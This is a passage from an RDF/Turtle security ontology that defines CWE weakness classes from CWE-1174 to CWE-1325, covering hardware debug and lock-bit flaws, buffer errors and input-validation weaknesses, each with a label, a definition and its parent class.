owl:Class ; rdfs:label "ASP.NET Misconfiguration: Improper Model Validation" ; d3f:cwe-id "CWE-1174" ; d3f:definition "The ASP.NET application does not use, or incorrectly uses, the model validation framework." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-1190 a owl:Class ; rdfs:label "DMA Device Enabled Too Early in Boot Phase" ; d3f:cwe-id "CWE-1190" ; d3f:definition "The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product." ; rdfs:subClassOf d3f:CWE-696 . d3f:CWE-1191 a owl:Class ; rdfs:label "On-Chip Debug and Test Interface With Improper Access Control" ; d3f:cwe-id "CWE-1191" ; d3f:definition "The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1192 a owl:Class ; rdfs:label "Improper Identifier for IP Block used in System-On-Chip (SOC)", "System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers" ; d3f:cwe-id "CWE-1192" ; d3f:definition "The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components." ; rdfs:subClassOf d3f:CWE-657 . d3f:CWE-1193 a owl:Class ; rdfs:label "Power-On of Untrusted Execution Core Before Enabling Fabric Access Control" ; d3f:cwe-id "CWE-1193" ; d3f:definition "The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled." ; rdfs:subClassOf d3f:CWE-696 . d3f:CWE-12 a owl:Class ; rdfs:label "ASP.NET Misconfiguration: Missing Custom Error Page" ; d3f:cwe-id "CWE-12" ; d3f:definition "An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses." ; rdfs:subClassOf d3f:CWE-756 . d3f:CWE-1209 a owl:Class ; rdfs:label "Failure to Disable Reserved Bits" ; d3f:cwe-id "CWE-1209" ; d3f:definition "The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-121 a owl:Class ; rdfs:label "Stack-based Buffer Overflow" ; d3f:cwe-id "CWE-121" ; d3f:definition "A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function)." ; d3f:synonym "Stack Overflow" ; rdfs:subClassOf d3f:CWE-787, d3f:CWE-788 . d3f:CWE-122 a owl:Class ; rdfs:label "Heap-based Buffer Overflow" ; d3f:cwe-id "CWE-122" ; d3f:definition "A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc()." ; rdfs:subClassOf d3f:CWE-787, d3f:CWE-788 . d3f:CWE-1221 a owl:Class ; rdfs:label "Incorrect Register Defaults or Module Parameters" ; d3f:cwe-id "CWE-1221" ; d3f:definition "Hardware description language code incorrectly defines register defaults or hardware Intellectual Property (IP) parameters to insecure values." ; rdfs:subClassOf d3f:CWE-1419, d3f:CWE-665 . d3f:CWE-1222 a owl:Class ; rdfs:label "Insufficient Granularity of Address Regions Protected by Register Locks" ; d3f:cwe-id "CWE-1222" ; d3f:definition "The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process." ; rdfs:subClassOf d3f:CWE-1220 . d3f:CWE-1223 a owl:Class ; rdfs:label "Race Condition for Write-Once Attributes" ; d3f:cwe-id "CWE-1223" ; d3f:definition "A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue." ; rdfs:subClassOf d3f:CWE-362 . d3f:CWE-1224 a owl:Class ; rdfs:label "Improper Restriction of Write-Once Bit Fields" ; d3f:cwe-id "CWE-1224" ; d3f:definition "The hardware design control register \"sticky bits\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-123 a owl:Class ; rdfs:label "Write-what-where Condition" ; d3f:cwe-id "CWE-123" ; d3f:definition "Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow." ; rdfs:subClassOf d3f:CWE-787 . d3f:CWE-1231 a owl:Class ; rdfs:label "Improper Prevention of Lock Bit Modification" ; d3f:cwe-id "CWE-1231" ; d3f:definition "The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1232 a owl:Class ; rdfs:label "Improper Lock Behavior After Power State Transition" ; d3f:cwe-id "CWE-1232" ; d3f:definition "Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-1233 a owl:Class ; rdfs:label "Security-Sensitive Hardware Controls with Missing Lock Bit Protection" ; d3f:cwe-id "CWE-1233" ; d3f:definition "The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration." ; rdfs:subClassOf d3f:CWE-284, d3f:CWE-667 . d3f:CWE-1234 a owl:Class ; rdfs:label "Hardware Internal or Debug Modes Allow Override of Locks" ; d3f:cwe-id "CWE-1234" ; d3f:definition "System configuration protection may be bypassed during debug mode." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-1235 a owl:Class ; rdfs:label "Incorrect Use of Autoboxing and Unboxing for Performance Critical Operations" ; d3f:cwe-id "CWE-1235" ; d3f:definition "The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations." ; rdfs:subClassOf d3f:CWE-400 . d3f:CWE-1236 a owl:Class ; rdfs:label "Improper Neutralization of Formula Elements in a CSV File" ; d3f:cwe-id "CWE-1236" ; d3f:definition "The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product." ; d3f:synonym "CSV Injection", "Excel Macro Injection", "Formula Injection" ; rdfs:subClassOf d3f:CWE-74 . d3f:CWE-1239 a owl:Class ; rdfs:label "Improper Zeroization of Hardware Register" ; d3f:cwe-id "CWE-1239" ; d3f:definition "The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes." ; rdfs:subClassOf d3f:CWE-226 . d3f:CWE-124 a owl:Class ; rdfs:label "Buffer Underwrite ('Buffer Underflow')" ; d3f:cwe-id "CWE-124" ; d3f:definition "The product writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer." ; d3f:synonym "buffer underrun" ; rdfs:subClassOf d3f:CWE-786, d3f:CWE-787 . d3f:CWE-1240 a owl:Class ; rdfs:label "Use of a Cryptographic Primitive with a Risky Implementation" ; d3f:cwe-id "CWE-1240" ; d3f:definition "To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation." ; rdfs:subClassOf d3f:CWE-327 . d3f:CWE-1241 a owl:Class ; rdfs:label "Use of Predictable Algorithm in Random Number Generator" ; d3f:cwe-id "CWE-1241" ; d3f:definition "The device uses an algorithm that is predictable and generates a pseudo-random number." ; rdfs:subClassOf d3f:CWE-330 . d3f:CWE-1242 a owl:Class ; rdfs:label "Inclusion of Undocumented Features or Chicken Bits" ; d3f:cwe-id "CWE-1242" ; d3f:definition "The device includes chicken bits or undocumented features that can create entry points for unauthorized actors." ; rdfs:subClassOf d3f:CWE-284, d3f:CWE-912 . d3f:CWE-1243 a owl:Class ; rdfs:label "Sensitive Non-Volatile Information Not Protected During Debug" ; d3f:cwe-id "CWE-1243" ; d3f:definition "Access to security-sensitive information stored in fuses is not limited during debug." ; rdfs:subClassOf d3f:CWE-1263 . d3f:CWE-1244 a owl:Class ; rdfs:label "Internal Asset Exposed to Unsafe Debug Access Level or State" ; d3f:cwe-id "CWE-1244" ; d3f:definition "The product uses physical debug or test interfaces with support for multiple access levels, but it assigns the wrong debug access level to an internal asset, providing unintended access to the asset from untrusted debug agents." ; rdfs:subClassOf d3f:CWE-863 . d3f:CWE-1245 a owl:Class ; rdfs:label "Improper Finite State Machines (FSMs) in Hardware Logic" ; d3f:cwe-id "CWE-1245" ; d3f:definition "Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim's system." ; rdfs:subClassOf d3f:CWE-684 . d3f:CWE-1246 a owl:Class ; rdfs:label "Improper Write Handling in Limited-write Non-Volatile Memories" ; d3f:cwe-id "CWE-1246" ; d3f:definition "The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories." ; rdfs:subClassOf d3f:CWE-400 . d3f:CWE-1247 a owl:Class ; rdfs:label "Improper Protection Against Voltage and Clock Glitches" ; d3f:cwe-id "CWE-1247" ; d3f:definition "The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device." ; rdfs:subClassOf d3f:CWE-1384 . d3f:CWE-1248 a owl:Class ; rdfs:label "Semiconductor Defects in Hardware Logic with Security-Sensitive Implications" ; d3f:cwe-id "CWE-1248" ; d3f:definition "The security-sensitive hardware module contains semiconductor defects." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1249 a owl:Class ; rdfs:label "Application-Level Admin Tool with Inconsistent View of Underlying Operating System" ; d3f:cwe-id "CWE-1249" ; d3f:definition "The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application's model of the OS's state is inconsistent with the OS's actual state." ; d3f:synonym "Ghost in the Shell" ; rdfs:subClassOf d3f:CWE-1250 . d3f:CWE-1251 a owl:Class ; rdfs:label "Mirrored Regions with Different Values" ; d3f:cwe-id "CWE-1251" ; d3f:definition "The product's architecture mirrors regions without ensuring that their contents always stay in sync." ; rdfs:subClassOf d3f:CWE-1250 . d3f:CWE-1252 a owl:Class ; rdfs:label "CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations" ; d3f:cwe-id "CWE-1252" ; d3f:definition "The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1253 a owl:Class ; rdfs:label "Incorrect Selection of Fuse Values" ; d3f:cwe-id "CWE-1253" ; d3f:definition "The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1254 a owl:Class ; rdfs:label "Incorrect Comparison Logic Granularity" ; d3f:cwe-id "CWE-1254" ; d3f:definition "The product's comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes." ; rdfs:subClassOf d3f:CWE-208, d3f:CWE-697 . d3f:CWE-1255 a owl:Class ; rdfs:label "Comparison Logic is Vulnerable to Power Side-Channel Attacks" ; d3f:cwe-id "CWE-1255" ; d3f:definition "A device's real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token." ; rdfs:subClassOf d3f:CWE-1300 . d3f:CWE-1256 a owl:Class ; rdfs:label "Improper Restriction of Software Interfaces to Hardware Features" ; d3f:cwe-id "CWE-1256" ; d3f:definition "The product provides software-controllable device functionality for capabilities such as power and clock management, but it does not properly limit functionality that can lead to modification of hardware memory or register bits, or the ability to observe physical side channels." ; rdfs:subClassOf d3f:CWE-285 . d3f:CWE-1257 a owl:Class ; rdfs:label "Improper Access Control Applied to Mirrored or Aliased Memory Regions" ; d3f:cwe-id "CWE-1257" ; d3f:definition "Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1258 a owl:Class ; rdfs:label "Exposure of Sensitive System Information Due to Uncleared Debug Information" ; d3f:cwe-id "CWE-1258" ; d3f:definition "The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered." ; rdfs:subClassOf d3f:CWE-200, d3f:CWE-212 . d3f:CWE-1259 a owl:Class ; rdfs:label "Improper Restriction of Security Token Assignment" ; d3f:cwe-id "CWE-1259" ; d3f:definition "The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-126 a owl:Class ; rdfs:label "Buffer Over-read" ; d3f:cwe-id "CWE-126" ; d3f:definition "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer." ; rdfs:subClassOf d3f:CWE-125, d3f:CWE-788 . d3f:CWE-1260 a owl:Class ; rdfs:label "Improper Handling of Overlap Between Protected Memory Ranges" ; d3f:cwe-id "CWE-1260" ; d3f:definition "The product allows address regions to overlap, which can result in the bypassing of intended memory protection." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1261 a owl:Class ; rdfs:label "Improper Handling of Single Event Upsets" ; d3f:cwe-id "CWE-1261" ; d3f:definition "The hardware logic does not effectively handle when single-event upsets (SEUs) occur." ; rdfs:subClassOf d3f:CWE-1384 . d3f:CWE-1262 a owl:Class ; rdfs:label "Improper Access Control for Register Interface" ; d3f:cwe-id "CWE-1262" ; d3f:definition "The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1264 a owl:Class ; rdfs:label "Hardware Logic with Insecure De-Synchronization between Control and Data Channels" ; d3f:cwe-id "CWE-1264" ; d3f:definition "The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete." ; rdfs:subClassOf d3f:CWE-821 . d3f:CWE-1265 a owl:Class ; rdfs:label "Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls" ; d3f:cwe-id "CWE-1265" ; d3f:definition "During execution of non-reentrant code, the product performs a call that unintentionally produces a nested invocation of the non-reentrant code." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-1266 a owl:Class ; rdfs:label "Improper Scrubbing of Sensitive Data from Decommissioned Device" ; d3f:cwe-id "CWE-1266" ; d3f:definition "The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect." ; rdfs:subClassOf d3f:CWE-404 . d3f:CWE-1267 a owl:Class ; rdfs:label "Policy Uses Obsolete Encoding" ; d3f:cwe-id "CWE-1267" ; d3f:definition "The product uses an obsolete encoding mechanism to implement access controls." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1268 a owl:Class ; rdfs:label "Policy Privileges are not Assigned Consistently Between Control and Data Agents" ; d3f:cwe-id "CWE-1268" ; d3f:definition "The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1269 a owl:Class ; rdfs:label "Product Released in Non-Release Configuration" ; d3f:cwe-id "CWE-1269" ; d3f:definition "The product released to market is released in pre-production or manufacturing configuration." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-127 a owl:Class ; rdfs:label "Buffer Under-read" ; d3f:cwe-id "CWE-127" ; d3f:definition "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer." ; rdfs:subClassOf d3f:CWE-125, d3f:CWE-786 . d3f:CWE-1270 a owl:Class ; rdfs:label "Generation of Incorrect Security Tokens" ; d3f:cwe-id "CWE-1270" ; d3f:definition "The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1271 a owl:Class ; rdfs:label "Uninitialized Value on Reset for Registers Holding Security Settings" ; d3f:cwe-id "CWE-1271" ; d3f:definition "Security-critical logic is not set to a known value on reset." ; rdfs:subClassOf d3f:CWE-909 . d3f:CWE-1272 a owl:Class ; rdfs:label "Sensitive Information Uncleared Before Debug/Power State Transition" ; d3f:cwe-id "CWE-1272" ; d3f:definition "The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions." ; rdfs:subClassOf d3f:CWE-226 . d3f:CWE-1273 a owl:Class ; rdfs:label "Device Unlock Credential Sharing" ; d3f:cwe-id "CWE-1273" ; d3f:definition "The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information." ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-1274 a owl:Class ; rdfs:label "Improper Access Control for Volatile Memory Containing Boot Code" ; d3f:cwe-id "CWE-1274" ; d3f:definition "The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1275 a owl:Class ; rdfs:label "Sensitive Cookie with Improper SameSite Attribute" ; d3f:cwe-id "CWE-1275" ; d3f:definition "The SameSite attribute for sensitive cookies is not set, or an insecure value is used." ; rdfs:subClassOf d3f:CWE-923 . d3f:CWE-1276 a owl:Class ; rdfs:label "Hardware Child Block Incorrectly Connected to Parent System" ; d3f:cwe-id "CWE-1276" ; d3f:definition "Signals between a hardware IP and the parent system design are incorrectly connected causing security risks." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1277 a owl:Class ; rdfs:label "Firmware Not Updateable" ; d3f:cwe-id "CWE-1277" ; d3f:definition "The product does not provide its users with the ability to update or patch its firmware to address any vulnerabilities or weaknesses that may be present." ; rdfs:subClassOf d3f:CWE-1329 . d3f:CWE-1278 a owl:Class ; rdfs:label "Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques" ; d3f:cwe-id "CWE-1278" ; d3f:definition "Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1279 a owl:Class ; rdfs:label "Cryptographic Operations are run Before Supporting Units are Ready" ; d3f:cwe-id "CWE-1279" ; d3f:definition "Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result." ; rdfs:subClassOf d3f:CWE-665, d3f:CWE-696 . d3f:CWE-128 a owl:Class ; rdfs:label "Wrap-around Error" ; d3f:cwe-id "CWE-128" ; d3f:definition "Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \"wraps around\" to a very small, negative, or undefined value." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-1280 a owl:Class ; rdfs:label "Access Control Check Implemented After Asset is Accessed" ; d3f:cwe-id "CWE-1280" ; d3f:definition "A product's hardware-based access control check occurs after the asset has been accessed." ; rdfs:subClassOf d3f:CWE-284, d3f:CWE-696 . d3f:CWE-1281 a owl:Class ; rdfs:label "Sequence of Processor Instructions Leads to Unexpected Behavior" ; d3f:cwe-id "CWE-1281" ; d3f:definition "Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-1282 a owl:Class ; rdfs:label "Assumed-Immutable Data is Stored in Writable Memory" ; d3f:cwe-id "CWE-1282" ; d3f:definition "Immutable data, such as a first-stage bootloader, device identifiers, and \"write-once\" configuration settings are stored in writable memory that can be re-programmed or updated in the field." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-1283 a owl:Class ; rdfs:label "Mutable Attestation or Measurement Reporting Data" ; d3f:cwe-id "CWE-1283" ; d3f:definition "The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1287 a owl:Class ; rdfs:label "Improper Validation of Specified Type of Input" ; d3f:cwe-id "CWE-1287" ; d3f:definition "The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type." ; rdfs:subClassOf d3f:CWE-20 . d3f:CWE-1288 a owl:Class ; rdfs:label "Improper Validation of Consistency within Input" ; d3f:cwe-id "CWE-1288" ; d3f:definition "The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent." ; rdfs:subClassOf d3f:CWE-20 . d3f:CWE-1289 a owl:Class ; rdfs:label "Improper Validation of Unsafe Equivalence in Input" ; d3f:cwe-id "CWE-1289" ; d3f:definition "The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value." ; rdfs:subClassOf d3f:CWE-20 . d3f:CWE-129 a owl:Class ; rdfs:label "Improper Validation of Array Index" ; d3f:cwe-id "CWE-129" ; d3f:definition "The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array." ; d3f:synonym "array index underflow", "index-out-of-range", "out-of-bounds array index" ; rdfs:subClassOf d3f:CWE-1285 . d3f:CWE-1290 a owl:Class ; rdfs:label "Incorrect Decoding of Security Identifiers" ; d3f:cwe-id "CWE-1290" ; d3f:definition "The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1291 a owl:Class ; rdfs:label "Public Key Re-Use for Signing both Debug and Production Code" ; d3f:cwe-id "CWE-1291" ; d3f:definition "The same public key is used for signing both debug and production code." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1292 a owl:Class ; rdfs:label "Incorrect Conversion of Security Identifiers" ; d3f:cwe-id "CWE-1292" ; d3f:definition "The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1293 a owl:Class ; rdfs:label "Missing Source Correlation of Multiple Independent Data" ; d3f:cwe-id "CWE-1293" ; d3f:definition "The product relies on one source of data, preventing the ability to detect if an adversary has compromised a data source." ; rdfs:subClassOf d3f:CWE-345 . d3f:CWE-1295 a owl:Class ; rdfs:label "Debug Messages Revealing Unnecessary Information" ; d3f:cwe-id "CWE-1295" ; d3f:definition "The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages." ; rdfs:subClassOf d3f:CWE-200 . d3f:CWE-1296 a owl:Class ; rdfs:label "Incorrect Chaining or Granularity of Debug Components" ; d3f:cwe-id "CWE-1296" ; d3f:definition "The product's debug components contain incorrect chaining or granularity of debug components." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1297 a owl:Class ; rdfs:label "Unprotected Confidential Information on Device is Accessible by OSAT Vendors" ; d3f:cwe-id "CWE-1297" ; d3f:definition "The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors." ; rdfs:subClassOf d3f:CWE-285 . d3f:CWE-1298 a owl:Class ; rdfs:label "Hardware Logic Contains Race Conditions" ; d3f:cwe-id "CWE-1298" ; d3f:definition "A race condition in the hardware logic results in undermining security guarantees of the system." ; rdfs:subClassOf d3f:CWE-362 . d3f:CWE-1299 a owl:Class ; rdfs:label "Missing Protection Mechanism for Alternate Hardware Interface" ; d3f:cwe-id "CWE-1299" ; d3f:definition "The lack of protections on alternate paths to access control-protected assets (such as unprotected shadow registers and other external facing unguarded interfaces) allows an attacker to bypass existing protections to the asset that are only performed against the primary path." ; rdfs:subClassOf d3f:CWE-288, d3f:CWE-420 . d3f:CWE-13 a owl:Class ; rdfs:label "ASP.NET Misconfiguration: Password in Configuration File" ; d3f:cwe-id "CWE-13" ; d3f:definition "Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers." ; rdfs:subClassOf d3f:CWE-260 . d3f:CWE-130 a owl:Class ; rdfs:label "Improper Handling of Length Parameter Inconsistency" ; d3f:cwe-id "CWE-130" ; d3f:definition "The product parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data." ; d3f:synonym "length manipulation", "length tampering" ; rdfs:subClassOf d3f:CWE-240 . d3f:CWE-1302 a owl:Class ; rdfs:label "Missing Security Identifier", "Missing Source Identifier in Entity Transactions on a System-On-Chip (SOC)" ; d3f:cwe-id "CWE-1302" ; d3f:definition "The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier." ; rdfs:subClassOf d3f:CWE-1294 . d3f:CWE-1303 a owl:Class ; rdfs:label "Non-Transparent Sharing of Microarchitectural Resources" ; d3f:cwe-id "CWE-1303" ; d3f:definition "Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts." ; rdfs:subClassOf d3f:CWE-1189, d3f:CWE-203 . d3f:CWE-1304 a owl:Class ; rdfs:label "Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation" ; d3f:cwe-id "CWE-1304" ; d3f:definition "The product performs a power save/restore operation, but it does not ensure that the integrity of the configuration state is maintained and/or verified between the beginning and ending of the operation." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1310 a owl:Class ; rdfs:label "Missing Ability to Patch ROM Code" ; d3f:cwe-id "CWE-1310" ; d3f:definition "Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state." ; rdfs:subClassOf d3f:CWE-1329 . d3f:CWE-1311 a owl:Class ; rdfs:label "Improper Translation of Security Attributes by Fabric Bridge" ; d3f:cwe-id "CWE-1311" ; d3f:definition "The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1312 a owl:Class ; rdfs:label "Missing Protection for Mirrored Regions in On-Chip Fabric Firewall" ; d3f:cwe-id "CWE-1312" ; d3f:definition "The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1313 a owl:Class ; rdfs:label "Hardware Allows Activation of Test or Debug Logic at Runtime" ; d3f:cwe-id "CWE-1313" ; d3f:definition "During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1314 a owl:Class ; rdfs:label "Missing Write Protection for Parametric Data Values" ; d3f:cwe-id "CWE-1314" ; d3f:definition "The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure." ; rdfs:subClassOf d3f:CWE-862 . d3f:CWE-1315 a owl:Class ; rdfs:label "Improper Setting of Bus Controlling Capability in Fabric End-point" ; d3f:cwe-id "CWE-1315" ; d3f:definition "The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1316 a owl:Class ; rdfs:label "Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges" ; d3f:cwe-id "CWE-1316" ; d3f:definition "The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1317 a owl:Class ; rdfs:label "Improper Access Control in Fabric Bridge" ; d3f:cwe-id "CWE-1317" ; d3f:definition "The product uses a fabric bridge for transactions between two Intellectual Property (IP) blocks, but the bridge does not properly perform the expected privilege, identity, or other access control checks between those IP blocks." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1318 a owl:Class ; rdfs:label "Missing Support for Security Features in On-chip Fabrics or Buses" ; d3f:cwe-id "CWE-1318" ; d3f:definition "On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1319 a owl:Class ; rdfs:label "Improper Protection against Electromagnetic Fault Injection (EM-FI)" ; d3f:cwe-id "CWE-1319" ; d3f:definition "The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed." ; rdfs:subClassOf d3f:CWE-693 . d3f:CWE-1320 a owl:Class ; rdfs:label "Improper Protection for Outbound Error Messages and Alert Signals" ; d3f:cwe-id "CWE-1320" ; d3f:definition "Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1321 a owl:Class ; rdfs:label "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')" ; d3f:cwe-id "CWE-1321" ; d3f:definition "The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype." ; rdfs:subClassOf d3f:CWE-915 . d3f:CWE-1322 a owl:Class ; rdfs:label "Use of Blocking Code in Single-threaded, Non-blocking Context" ; d3f:cwe-id "CWE-1322" ; d3f:definition "The product uses a non-blocking model that relies on a single threaded process for features such as scalability, but it contains code that can block when it is invoked." ; rdfs:subClassOf d3f:CWE-834 . d3f:CWE-1323 a owl:Class ; rdfs:label "Improper Management of Sensitive Trace Data" ; d3f:cwe-id "CWE-1323" ; d3f:definition "Trace data collected from several sources on the System-on-Chip (SoC) is stored in unprotected locations or transported to untrusted agents." ; rdfs:subClassOf d3f:CWE-284 . d3f:CWE-1325 a owl:Class ; rdfs:label "Improperly Controlled Sequential Memory Allocation" ; d3f:cwe-id "CWE-1325" ; d3f:definition "The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects." ; d3f:synonym "Stack Exhaustion" ; rdfs:subClassOf 